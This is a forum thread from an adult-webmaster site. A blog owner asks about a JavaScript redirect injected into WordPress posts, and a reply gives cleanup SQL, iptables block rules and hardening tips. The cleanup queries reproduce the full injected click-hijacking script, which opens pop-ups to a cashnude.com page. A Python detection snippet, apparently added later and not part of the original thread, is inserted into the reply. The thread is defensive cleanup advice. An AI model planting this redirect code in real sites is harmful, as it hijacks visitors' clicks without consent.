Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

Old 09-10-2014, 05:00 AM   #1
ApolloCash
Confirmed User
Join Date: Apr 2007
Posts: 483
Wordpress malware

hey

I apologize if this is not the right place to start this thread; anyway:

We run plenty of blogs; recently some of them have been injected with a JavaScript redirect script. The place of injection: DB table wp_posts -> post_content.
The JS code is added at the end of the post.

The script redirects to a webcam site by cashnude.

I have googled a lot and could find only how to remove the injected script, but the injection was back the next day, of course.

I could not find any information on how they inject the javascript redirect.

I suspect a WP plugin, WP theme or WP core vulnerability; however, only newly created blogs (like 1 year old) seem to be injected, WP core version 3.7.1 + older WP core versions seem to be intact.
Blogs with various WP plugins and WP themes have been injected.

Does anybody have experience with this JS redirect by cashnude?

Any response will be appreciated.

Thanks!
__________________
Peter
info[} apollocash[} com
icq: 176-73--77-01

Old 09-10-2014, 06:39 AM   #2
TROLLENSTEIN
Server Monkey
Join Date: May 2013
Location: Europe.
Posts: 164
Hello, I'm assuming all your blogs are on the apollocash server. Here is how to kill it and prevent it from coming back in 5 easy steps:

1. Delete ALL cookies in your browser, and empty your browser cache. Close your browser down. (Do NOT visit the "infected" sites!)

2. Open your browser again and log into your server PHPMYADMIN and run both cleaning queries below. (Depending on your database structure you may need to run these on all of them!)

First query to run is...

Code:
update wp_posts set post_content = replace(post_content, '<script type="text/javascript">// <![CDATA[

function consoleLog(e){try{console.log(e)}catch(t){}}(function(e,t){function n(){if(!s){s=true;for(var e=0;e<i.length;e++){i[e].fn.call(window,i[e].ctx)}i=[]}}function r(){if(document.readyState==="complete"){n()}}e=e||"docReady";t=t||window;var i=[];var s=false;var o=false;t[e]=function(e,t){if(s){setTimeout(function(){e(t)},1);return}else{i.push({fn:e,ctx:t})}if(document.readyState==="complete"){setTimeout(n,1)}else if(!o){if(document.addEventListener){document.addEventListener("DOMContentLoaded",n,false);window.addEventListener("load",n,false)}else{document.attachEvent("onreadystatechange",r);window.attachEvent("onload",n)}o=true}}})("docReady",window);var aMs=document.getElementsByTagName("a");var amSwindow=false;docReady(function(){for(var e=0;e<aMs.length;e++){aMs[e].addEventListener("click",function(e){var t=Math.floor(Math.random()*2+1);consoleLog("ps:"+t);if(t==2){if(!amSwindow){amSwindow=window.open("http://fish-14j-js.cashnude.com/","NEI","width=10000,height=10000")}else{amSwindow.focus()}}},false)}})

// ]]></script>', '') where post_content like '%<script type="text/javascript">// <![CDATA[

function consoleLog(e){try{console.log(e)}catch(t){}}(function(e,t){function n(){if(!s){s=true;for(var e=0;e<i.length;e++){i[e].fn.call(window,i[e].ctx)}i=[]}}function r(){if(document.readyState==="complete"){n()}}e=e||"docReady";t=t||window;var i=[];var s=false;var o=false;t[e]=function(e,t){if(s){setTimeout(function(){e(t)},1);return}else{i.push({fn:e,ctx:t})}if(document.readyState==="complete"){setTimeout(n,1)}else if(!o){if(document.addEventListener){document.addEventListener("DOMContentLoaded",n,false);window.addEventListener("load",n,false)}else{document.attachEvent("onreadystatechange",r);window.attachEvent("onload",n)}o=true}}})("docReady",window);var aMs=document.getElementsByTagName("a");var amSwindow=false;docReady(function(){for(var e=0;e<aMs.length;e++){aMs[e].addEventListener("click",function(e){var t=Math.floor(Math.random()*2+1);consoleLog("ps:"+t);if(t==2){if(!amSwindow){amSwindow=window.open("http://fish-14j-js.cashnude.com/","NEI","width=10000,height=10000")}else{amSwindow.focus()}}},false)}})

// ]]></script>%';

And the second query is...

Code:
-- the single quotes around text/javascript are escaped (\') so the SQL string literal does not end early
update wp_posts set post_content = replace(post_content, '<script  type=\'text/javascript\' rel="f179568d5746648ce97a252d9b3db074">

function consoleLog(e){try{console.log(e)}catch(t){}}(function(e,t){function n(){if(!s){s=true;for(var e=0;e<i.length;e++){i[e].fn.call(window,i[e].ctx)}i=[]}}function r(){if(document.readyState==="complete"){n()}}e=e||"docReady";t=t||window;var i=[];var s=false;var o=false;t[e]=function(e,t){if(s){setTimeout(function(){e(t)},1);return}else{i.push({fn:e,ctx:t})}if(document.readyState==="complete"){setTimeout(n,1)}else if(!o){if(document.addEventListener){document.addEventListener("DOMContentLoaded",n,false);window.addEventListener("load",n,false)}else{document.attachEvent("onreadystatechange",r);window.attachEvent("onload",n)}o=true}}})("docReady",window);var aMs=document.getElementsByTagName("a");var amSwindow=false;docReady(function(){for(var e=0;e<aMs.length;e++){aMs[e].addEventListener("click",function(e){var t=Math.floor(Math.random()*2+1);consoleLog("ps:"+t);if(t==2){if(!amSwindow){amSwindow=window.open("http://fish-14j-js.cashnude.com/","NEI","width=10000,height=10000")}else{amSwindow.focus()}}},false)}})

</script>', '') where post_content like '%<script  type=\'text/javascript\' rel="f179568d5746648ce97a252d9b3db074">

function consoleLog(e){try{console.log(e)}catch(t){}}(function(e,t){function n(){if(!s){s=true;for(var e=0;e<i.length;e++){i[e].fn.call(window,i[e].ctx)}i=[]}}function r(){if(document.readyState==="complete"){n()}}e=e||"docReady";t=t||window;var i=[];var s=false;var o=false;t[e]=function(e,t){if(s){setTimeout(function(){e(t)},1);return}else{i.push({fn:e,ctx:t})}if(document.readyState==="complete"){setTimeout(n,1)}else if(!o){if(document.addEventListener){document.addEventListener("DOMContentLoaded",n,false);window.addEventListener("load",n,false)}else{document.attachEvent("onreadystatechange",r);window.attachEvent("onload",n)}o=true}}})("docReady",window);var aMs=document.getElementsByTagName("a");var amSwindow=false;docReady(function(){for(var e=0;e<aMs.length;e++){aMs[e].addEventListener("click",function(e){var t=Math.floor(Math.random()*2+1);consoleLog("ps:"+t);if(t==2){if(!amSwindow){amSwindow=window.open("http://fish-14j-js.cashnude.com/","NEI","width=10000,height=10000")}else{amSwindow.focus()}}},false)}})

</script>%';
You can Copy & Paste the 2 queries above into PHPMYADMIN and they should run fine.


3. Exit out of PHPMYADMIN and close your browser for now.

4. SSH into your server and run the following to your IPTABLES. (simply drop all packets from the payload site and cashnude servers. If you have not created IPTABLES before now (and you should have!) let me know in a reply and I will provide a fresh complete set for you.)

Code:
iptables -I INPUT -s 213.207.70.38 -j DROP
iptables -I INPUT -s 31.186.174.178 -j DROP
Then save your new IPTABLES lines with:

Code:
/sbin/service iptables save
Then restart Apache, for good measure, with:

Code:
service httpd restart
5. Change your SSH and FTP passwords immediately (just good practice).

As for how they did it, without access to your server I can't offer you an honest 100% exact answer. I did, however, take a quick look and it appears your server has not been hardened in any way. I would start by removing your PHPEXEC widgets (very dangerous!) and then lock the server down to prevent (well, at least make it harder to do, as nothing is 100% secure) this in the future.
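The two queries above only remove the exact strings pasted into them, so a payload with a different rel hash or without the CDATA wrapper slips through. As an added example that is not part of this thread, the Python below generalizes that cleanup into one pattern that matches both variants shown (CDATA and rel="hash") on constructed sample rows in the shape of wp_posts; the function names and the SAMPLE_ROWS data are my own assumptions.

```python
import re

# Constructed sample rows in the shape of wp_posts (ID, post_content); not data from the thread's servers.
# The two payload shapes seen in the thread are reduced to their distinguishing parts: the opening tag
# (one with CDATA markers, one with a rel="<hash>" attribute) and the window.open() call to cashnude.com.
INJECTED_CDATA = (
    '<script type="text/javascript">// <![CDATA[\n\n'
    'var amSwindow=false;/* ...click handler... */'
    'amSwindow=window.open("http://fish-14j-js.cashnude.com/","NEI","width=10000,height=10000")\n\n'
    '// ]]></script>'
)
INJECTED_REL = (
    "<script  type='text/javascript' rel=\"f179568d5746648ce97a252d9b3db074\">\n\n"
    'var amSwindow=false;/* ...click handler... */'
    'amSwindow=window.open("http://fish-14j-js.cashnude.com/","NEI","width=10000,height=10000")\n\n'
    '</script>'
)
SAMPLE_ROWS = [
    (1, "<p>First post.</p>\n" + INJECTED_CDATA),
    (2, "<p>Second post.</p>\n" + INJECTED_REL),
    (3, '<p>Clean post with its own inline script.</p>\n<script type="text/javascript">var ok=1;</script>'),
]

# Any <script> element whose body mentions the redirect domain, regardless of attributes or CDATA
# wrapping. The tempered dot keeps a match from swallowing a later, legitimate script element.
INJECT_RE = re.compile(
    r'<script\b[^>]*>'
    r'(?:(?!</script>).)*?cashnude\.com(?:(?!</script>).)*?'
    r'</script>',
    re.IGNORECASE | re.DOTALL,
)


def find_injections(post_content):
    """Return every injected <script> block found in one post_content value."""
    return INJECT_RE.findall(post_content)


def strip_injections(post_content):
    """Return post_content with injected blocks removed; untouched posts come back unchanged."""
    return INJECT_RE.sub("", post_content).rstrip() if INJECT_RE.search(post_content) else post_content


def triage(rows):
    """Map post ID -> number of injected blocks, for infected rows only (a re-infection watch list)."""
    return {post_id: len(hits) for post_id, content in rows if (hits := find_injections(content))}


if __name__ == "__main__":
    for post_id, count in triage(SAMPLE_ROWS).items():
        print(f"post {post_id}: {count} injected script block(s)")
```

Running triage daily against the real table (via a SELECT of ID, post_content) shows whether the injection returns after cleanup, which is the signal that the entry point is still open.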
Old 09-10-2014, 07:31 AM   #3
ApolloCash
Confirmed User
Join Date: Apr 2007
Posts: 483
Hello, thank you for the advice, I have forwarded it to our server admin.
SSH/FTP/MySQL passwords changed already.

One more question: we host some ads on our blogs (header/footer ads, sidebar ads). I would remove all PHPEXEC plugins in no time as you recommended, but what else could we use in order to run our PHP-based ad rotator?
__________________
Peter
info[} apollocash[} com
icq: 176-73--77-01

Old 09-13-2014, 10:09 AM   #4
ApolloCash
Confirmed User
Join Date: Apr 2007
Posts: 483
bump bump
__________________
Peter
info[} apollocash[} com
icq: 176-73--77-01